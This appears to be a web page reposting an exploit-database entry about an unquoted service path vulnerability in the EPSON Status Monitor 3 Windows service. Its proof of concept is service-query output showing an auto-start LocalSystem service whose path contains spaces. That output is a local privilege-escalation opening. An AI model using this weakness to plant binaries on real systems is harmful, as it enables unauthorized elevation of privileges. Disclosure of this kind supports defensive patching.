ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection

EPSON Status Monitor 3 ‘EPSON_PM_RPCV4_06’ – Unquoted Service Path Exploit

Date: 2020-12-01

CVE: N/A

Platform: WIN

#Exploit Title: EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path
#Exploit Author : SamAlucard
#Vendor :  SEIKO EPSON Corp
#Version : EPSON_PM_RPCV4_06 8.0
#Vendor Homepage : https://epson.com
#Tested on OS: Windows 7 Pro

#Analyze PoC :
==============
C:\>sc qc EPSON_PM_RPCV4_06
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: EPSON_PM_RPCV4_06
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Common Files\EPSON\EPW!3
SSRP\E_S60RPB.EXE
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : EPSON V3 Service4(06)
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
Bookmark
EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path Exploit
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  Google Pixel Bug nets security researcher a whopping $70k bounty

Leave a Comment

Your email address will not be published. Required fields are marked *

RiSec Captcha + 46 = 50